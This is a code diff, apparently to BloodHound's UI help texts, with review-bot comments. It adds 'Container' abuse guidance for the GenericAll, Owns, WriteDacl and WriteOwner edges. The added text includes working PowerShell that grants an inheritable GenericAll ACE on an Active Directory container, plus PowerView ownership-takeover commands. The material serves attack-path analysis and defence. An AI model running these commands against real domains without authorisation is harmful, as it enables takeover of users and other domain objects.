diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/Abuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/Abuse.tsx
index 5f414dc1d7..11ed587225 100644
--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/Abuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/Abuse.tsx
@@ -18,7 +18,15 @@ import { FC } from 'react';
import { Typography } from '@mui/material';
const Abuse: FC = () => {
- return There is no abuse info related to this edge.;
+ return (
+ <>
+
+ Permissions on the parent of a child object may enable compromise of the child object through inherited
+ ACEs or linked GPOs.
+
+ See the inbound edges on the parent object for details.
+ >
+ );
};
export default Abuse;
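Review bot: The new Abuse text attributes compromise of child objects to `inherited ACEs or linked GPOs`, while the General.tsx hunk in this same commit deletes the sentence stating that GPOs linked to a container apply to contained objects. If that sentence was dropped because GPO linking is no longer described on the Contains edge, the Abuse text should be brought in line with it, e.g. `Permissions on the parent of a child object may enable compromise of the child object through inherited ACEs.`; otherwise the two texts should agree on whether GPOs are in scope here. The closing `See the inbound edges on the parent object for details.` would be more actionable if it named the edge kinds that carry those permissions, which this commit extends with a Container case (GenericAll, Owns, WriteDacl, WriteOwner).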
diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/General.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/General.tsx
index 7a0a0a068b..f1d4c1b13b 100644
--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/General.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Contains/General.tsx
@@ -25,9 +25,6 @@ const General: FC = ({ sourceName, sourceType, targetName, target
{typeFormat(sourceType)} {sourceName} contains the {typeFormat(targetType)} {targetName}.
-
- GPOs linked to a container apply to all objects that are contained by the container.
-
>
);
};
diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx
index 8b90d4e3f8..a3fe7b33c0 100644
--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx
@@ -17,6 +17,7 @@
import { FC } from 'react';
import { Link, Typography } from '@mui/material';
import { EdgeInfoProps } from '../index';
+import CodeController from '../CodeController/CodeController';
const WindowsAbuse: FC = ({
sourceName,
@@ -699,6 +700,37 @@ const WindowsAbuse: FC =
>
);
+ case 'Container':
+ return (
+ <>
+
+ With full control of the container, you may add a new ACE on the container that will inherit
+ down to the objects under that container.
+
+ This can be done with PowerShell:
+
+ {`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE"
+ $principalName = "principal" # SAM account name of principal
+
+ # Find the certificate template
+ $template = [ADSI]"LDAP://$containerDN"
+
+ # Construct the ACE
+ $account = New-Object System.Security.Principal.NTAccount($principalName)
+ $sid = $account.Translate([System.Security.Principal.SecurityIdentifier])
+ $ace = New-Object DirectoryServices.ActiveDirectoryAccessRule(
+ $sid,
+ [System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
+ [System.Security.AccessControl.AccessControlType]::Allow,
+ [System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents
+ )
+ # Add the new ACE to the ACL
+ $acl = $template.psbase.ObjectSecurity
+ $acl.AddAccessRule($ace)
+ $template.psbase.CommitChanges()`}
+
+ >
+ );
case 'CertTemplate':
return (
<>
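Review bot: The PowerShell snippet added for the `Container` case carries a comment and variable name copied from the CertTemplate variant: `# Find the certificate template` and `$template` refer to a certificate template, but the object bound at `LDAP://$containerDN` is the container itself. Rename to `$container = [ADSI]"LDAP://$containerDN"` under a `# Bind to the container` comment and update the three later `$template.` references accordingly, so the help text does not suggest a template is involved. The same copied comment and variable appear in the Owns, WriteDacl and WriteOwner WindowsAbuse hunks of this commit. `$principalName = "principal"` is a hard-coded placeholder even though `sourceName` is destructured by this component; if `sourceName` is a SAM account name here it could be interpolated into the template literal, but confirm its format before doing so. The enclosing switch starts and ends outside the hunk.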
diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx
index 37662c2154..49cadd9a4c 100644
--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx
@@ -17,6 +17,7 @@
import { FC } from 'react';
import { Link, Typography } from '@mui/material';
import { EdgeInfoProps } from '../index';
+import CodeController from '../CodeController/CodeController';
const WindowsAbuse: FC = ({
sourceName,
@@ -921,6 +922,37 @@ const WindowsAbuse: FC =
>
);
+ case 'Container':
+ return (
+ <>
+
+ With ownership of the container object, you may grant yourself the GenericAll permission
+ inherited to child objects.
+
+ This can be done with PowerShell:
+
+ {`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE"
+ $principalName = "principal" # SAM account name of principal
+
+ # Find the certificate template
+ $template = [ADSI]"LDAP://$containerDN"
+
+ # Construct the ACE
+ $account = New-Object System.Security.Principal.NTAccount($principalName)
+ $sid = $account.Translate([System.Security.Principal.SecurityIdentifier])
+ $ace = New-Object DirectoryServices.ActiveDirectoryAccessRule(
+ $sid,
+ [System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
+ [System.Security.AccessControl.AccessControlType]::Allow,
+ [System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents
+ )
+ # Add the new ACE to the ACL
+ $acl = $template.psbase.ObjectSecurity
+ $acl.AddAccessRule($ace)
+ $template.psbase.CommitChanges()`}
+
+ >
+ );
case 'CertTemplate':
return (
<>
diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx
index a779a5cb52..3bbd5e23d5 100644
--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx
@@ -17,6 +17,7 @@
import { FC } from 'react';
import { Link, Typography } from '@mui/material';
import { EdgeInfoProps } from '../index';
+import CodeController from '../CodeController/CodeController';
const WindowsAbuse: FC = ({
sourceName,
@@ -864,6 +865,37 @@ const WindowsAbuse: FC =
>
);
+ case 'Container':
+ return (
+ <>
+
+ With WriteDacl on the container object, you may grant yourself the GenericAll permission
+ inherited to child objects.
+
+ This can be done with PowerShell:
+
+ {`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE"
+ $principalName = "principal" # SAM account name of principal
+
+ # Find the certificate template
+ $template = [ADSI]"LDAP://$containerDN"
+
+ # Construct the ACE
+ $account = New-Object System.Security.Principal.NTAccount($principalName)
+ $sid = $account.Translate([System.Security.Principal.SecurityIdentifier])
+ $ace = New-Object DirectoryServices.ActiveDirectoryAccessRule(
+ $sid,
+ [System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
+ [System.Security.AccessControl.AccessControlType]::Allow,
+ [System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents
+ )
+ # Add the new ACE to the ACL
+ $acl = $template.psbase.ObjectSecurity
+ $acl.AddAccessRule($ace)
+ $template.psbase.CommitChanges()`}
+
+ >
+ );
case 'CertTemplate':
return (
<>
diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx
index cbeda9895e..0fbdf7bb87 100644
--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx
@@ -17,6 +17,7 @@
import { FC } from 'react';
import { Link, Typography } from '@mui/material';
import { EdgeInfoProps } from '../index';
+import CodeController from '../CodeController/CodeController';
const WindowsAbuse: FC = ({
sourceName,
@@ -1019,6 +1020,60 @@ const WindowsAbuse: FC =
>
);
+ case 'Container':
+ return (
+ <>
+
+ To change the ownership of the object, you may use the Set-DomainObjectOwner function in
+ PowerView.
+
+
+ You may need to authenticate to the Domain Controller as{' '}
+ {sourceType === 'User'
+ ? `${sourceName} if you are not running a process as that user`
+ : `a member of ${sourceName} if you are not running a process as a member`}
+ . To do this in conjunction with Set-DomainObjectOwner, first create a PSCredential object
+ (these examples comes from the PowerView help documentation):
+
+
+ {"$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n" +
+ "$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)"}
+
+
+ Then, use Set-DomainObjectOwner, optionally specifying $Cred if you are not already running a
+ process as a member of (the group that holds this ACE):
+
+
+ {'Set-DomainObjectOwner -Credential $Cred -TargetIdentity dfm -OwnerIdentity harmj0y'}
+
+
+ Now with ownership of the container object, you may grant yourself the GenericAll permission
+ inherited to child objects.
+
+ This can be done with PowerShell:
+
+ {`$containerDN = "CN=USERS,DC=DUMPSTER,DC=FIRE"
+ $principalName = "principal" # SAM account name of principal
+
+ # Find the certificate template
+ $template = [ADSI]"LDAP://$containerDN"
+
+ # Construct the ACE
+ $account = New-Object System.Security.Principal.NTAccount($principalName)
+ $sid = $account.Translate([System.Security.Principal.SecurityIdentifier])
+ $ace = New-Object DirectoryServices.ActiveDirectoryAccessRule(
+ $sid,
+ [System.DirectoryServices.ActiveDirectoryRights]::GenericAll,
+ [System.Security.AccessControl.AccessControlType]::Allow,
+ [System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents
+ )
+ # Add the new ACE to the ACL
+ $acl = $template.psbase.ObjectSecurity
+ $acl.AddAccessRule($ace)
+ $template.psbase.CommitChanges()`}
+
+ >
+ );
case 'CertTemplate':
return (
<>
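Review bot: `(these examples comes from the PowerView help documentation)` should read `these examples come from the PowerView help documentation`. The phrase `a process as a member of (the group that holds this ACE)` reads like an unfilled template where `${sourceName}` was intended, given that the preceding paragraph already interpolates `sourceName`; confirm against the other cases in this file before changing it. The enclosing switch continues outside the hunk.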